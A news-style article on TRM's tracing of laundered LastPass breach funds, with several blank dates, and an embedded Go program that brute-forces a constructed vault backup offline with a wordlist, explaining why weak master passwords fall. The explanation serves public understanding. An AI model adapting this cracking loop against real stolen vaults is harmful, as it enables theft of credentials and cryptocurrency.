TRM identified Russian cybercriminal infrastructure at multiple points in the laundering pipeline linked to the LastPass breach. According to TRM, demixing techniques allowed analysts to link pre- and post-mix activity to the same actors, despite the use of mixers such as Wasabi Wallet. Laundered Bitcoin (BTC) was found to have flowed through the Russian exchanges Cryptex and Audi6. Cryptex was sanctioned in and Audi6 is associated with cybercriminal activity, with one of them receiving LastPass-linked funds as recently as .
The LastPass breach exposed backups of approximately 30 million customer vaults, impacting more than 25 million users globally, according to TRM. Attackers were able to download these encrypted containers, which creates a long-term risk for any vault protected by a weak master password: once the ciphertext is in the attacker's hands, guesses can be tested offline at leisure, with no server-side rate limit or lockout in the way. TRM estimates that over $28 million in cryptocurrency was stolen, converted to Bitcoin, and laundered through Wasabi Wallet in late and early . A subsequent wave identified in traced approximately $7 million in additional stolen funds through Wasabi Wallet, with withdrawals ultimately flowing to Audi6.
The ongoing wallet drains, occurring years after the initial breach, are attributed by TRM to users who failed to change or secure their master passwords, leaving their vaults vulnerable to offline decryption. One caveat matters here: because the attackers already hold a copy of the encrypted backup, changing the master password today does not protect that copy; it only protects the live account. A vault whose master password could be guessed has to be treated as read, and the secrets stored inside it, above all seed phrases and private keys, need to be rotated by moving funds to fresh wallets. TRM assesses that the activity is consistent with Russian cybercrime involvement because of repeated interaction with Russia-associated infrastructure, continuity of control across pre- and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps. The firm notes that stolen funds were repeatedly laundered through infrastructure commonly associated with Russian cybercriminal ecosystems.
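To make the "offline decryption" risk concrete, here is an added example (written for this article; it is not TRM's or LastPass's code) of how an attacker tests master-password guesses against a stolen vault backup without ever contacting the service. It is modelled on the published LastPass design, in which PBKDF2-SHA256 derives an AES-256 key from the master password, salted with the account e-mail, and the per-account iteration count is stored alongside the vault; the CBC layout, the plaintext marker, the wordlist, the salt and the vault contents are all constructed for the demo and are assumptions, not recovered data. The iteration count of 5,000 reflects the low legacy default older accounts were left on; the later default was 100,100.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// Marker the constructed vault plaintext starts with, so a guess is confirmed by
// structure and not only by "padding looked valid" (which a wrong key passes
// about 1 time in 256). Real vaults have their own structure; this is an assumption.
var vaultMarker = []byte("DEMO-VAULT:")

// pbkdf2SHA256 is PBKDF2 with HMAC-SHA256 (RFC 8018, section 5.2), written out
// with the standard library so the per-guess cost is visible: iters HMACs per guess.
func pbkdf2SHA256(password, salt []byte, iters, keyLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var out []byte
	ctr := make([]byte, 4)
	for block := 1; len(out) < keyLen; block++ {
		binary.BigEndian.PutUint32(ctr, uint32(block))
		prf.Reset()
		prf.Write(salt)
		prf.Write(ctr)
		u := prf.Sum(nil)             // U_1 = PRF(P, S || INT(block))
		t := append([]byte(nil), u...) // T = U_1
		for i := 1; i < iters; i++ {   // U_j = PRF(P, U_{j-1}), XORed into T
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// VaultBlob is what the attacker holds after downloading a backup: ciphertext plus
// the public KDF parameters, which is everything needed to test guesses offline.
type VaultBlob struct {
	Salt  []byte // not secret (LastPass used the account e-mail as the salt)
	Iters int    // per-account PBKDF2 iteration count
	IV    []byte
	CT    []byte // AES-256-CBC with PKCS#7 padding
}

func pkcs7Pad(b []byte, n int) []byte {
	p := n - len(b)%n
	return append(b, bytes.Repeat([]byte{byte(p)}, p)...)
}

func pkcs7Unpad(b []byte) ([]byte, bool) {
	if len(b) == 0 {
		return nil, false
	}
	p := int(b[len(b)-1])
	if p == 0 || p > aes.BlockSize || p > len(b) {
		return nil, false
	}
	for _, c := range b[len(b)-p:] {
		if int(c) != p {
			return nil, false
		}
	}
	return b[:len(b)-p], true
}

// EncryptVault builds the constructed vault for the demo (the victim side).
func EncryptVault(master string, salt []byte, iters int, iv, plaintext []byte) VaultBlob {
	key := pbkdf2SHA256([]byte(master), salt, iters, 32)
	blk, _ := aes.NewCipher(key)
	pt := pkcs7Pad(append(append([]byte(nil), vaultMarker...), plaintext...), aes.BlockSize)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(blk, iv).CryptBlocks(ct, pt)
	return VaultBlob{Salt: salt, Iters: iters, IV: iv, CT: ct}
}

// TryMaster is the attacker's oracle: derive the key from a guess, decrypt, and
// accept only if both the padding and the expected plaintext structure check out.
func TryMaster(v VaultBlob, guess string) ([]byte, bool) {
	key := pbkdf2SHA256([]byte(guess), v.Salt, v.Iters, 32)
	blk, _ := aes.NewCipher(key)
	pt := make([]byte, len(v.CT))
	cipher.NewCBCDecrypter(blk, v.IV).CryptBlocks(pt, v.CT)
	pt, ok := pkcs7Unpad(pt)
	if !ok || !bytes.HasPrefix(pt, vaultMarker) {
		return nil, false
	}
	return pt[len(vaultMarker):], true
}

// CrackVault runs a wordlist against the blob with no server in the loop: nothing
// rate-limits, locks out or logs these attempts. Returns the password, the number
// of guesses it took, and whether it was found.
func CrackVault(v VaultBlob, wordlist []string) (string, int, bool) {
	for i, w := range wordlist {
		if _, ok := TryMaster(v, w); ok {
			return w, i + 1, true
		}
	}
	return "", len(wordlist), false
}

func main() {
	// Constructed sample: weak master password, low legacy iteration count.
	salt := []byte("victim@example.com")
	iv := []byte("0123456789abcdef") // fixed IV for reproducibility only
	v := EncryptVault("Summer2023", salt, 5000, iv, []byte("exchange seed words: ..."))
	wordlist := []string{"password", "123456", "Winter2022", "Summer2023", "correcthorsebattery"}
	if pw, n, ok := CrackVault(v, wordlist); ok {
		fmt.Printf("recovered master password %q after %d guesses (iters=%d)\n", pw, n, v.Iters)
		pt, _ := TryMaster(v, pw)
		fmt.Printf("vault contents: %s\n", pt)
	}
}
```

Two things worth noticing when running it. First, the only knob the victim controlled after the theft is the iteration count baked into the stolen blob: moving from 5,000 to 100,100 (or the 600,000 OWASP now suggests for PBKDF2-SHA256) multiplies the attacker's per-guess cost by that factor, but a password that sits on the first page of a wordlist is still found in seconds. Second, nothing in `CrackVault` touches LastPass; this is why changing the master password after the fact cannot help the already-exfiltrated copy and why the secrets inside the vault must be rotated instead.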
While TRM's analysis provides a clear on-chain view of asset movement, definitive attribution of the original LastPass intrusion cannot yet be confirmed. Specific details regarding user refunds or compensation for affected individuals have not been disclosed by LastPass or other entities.
This case highlights the operational resilience of cybercrime ecosystems and the diminishing effectiveness of mixing services as a reliable means of obfuscation, according to TRM. The findings underscore the continued role of Russia-based financial infrastructure as a systemic enabler of global cybercrime. Users impacted by the LastPass breach are advised to secure their accounts and change their master passwords, and, because the stolen backups can still be attacked offline, to move any cryptocurrency whose seed phrases or keys were stored in the vault to fresh wallets and rotate the other credentials it held, as the threat of ongoing wallet drains persists.
